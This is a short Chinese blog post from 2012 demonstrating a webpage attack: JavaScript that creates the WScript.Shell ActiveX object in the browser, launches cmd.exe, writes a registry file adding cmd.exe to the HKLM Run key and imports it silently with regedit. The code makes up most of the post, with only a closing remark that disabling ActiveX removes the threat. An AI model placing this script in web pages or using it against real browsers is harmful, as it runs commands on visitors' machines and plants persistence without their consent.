HTML网页漏洞攻击

作者:邬畏畏

      在网页中我们可以利用javascript执行客户端的WSH,下面代码展示了在网页中创建WSH对象并且运行cmd.exe创建文件并操作注册表。

document.write("<OBJECT classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B id=wsh></object>");
wsh.Run('cmd.exe');

wsh.Run('cmd.exe /c echo Windows Registry Editor Version 5.00>>auto.reg');
wsh.Run('cmd.exe /c echo [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]>auto.reg');
wsh.Run('cmd.exe /c echo @="cmd.exe">>auto.reg');
wsh.Run('cmd.exe /c regedit /s auto.reg');

上述代码存为HTML格式。

     当然如果浏览器的安全级别设置的较高(如:禁用ActiveX等相关设置),上述代码就没有威胁了。

posted @ 2012-02-04 16:20  翱翔软件  阅读(3590)  评论(1编辑  收藏  举报

欢迎访问翱翔软件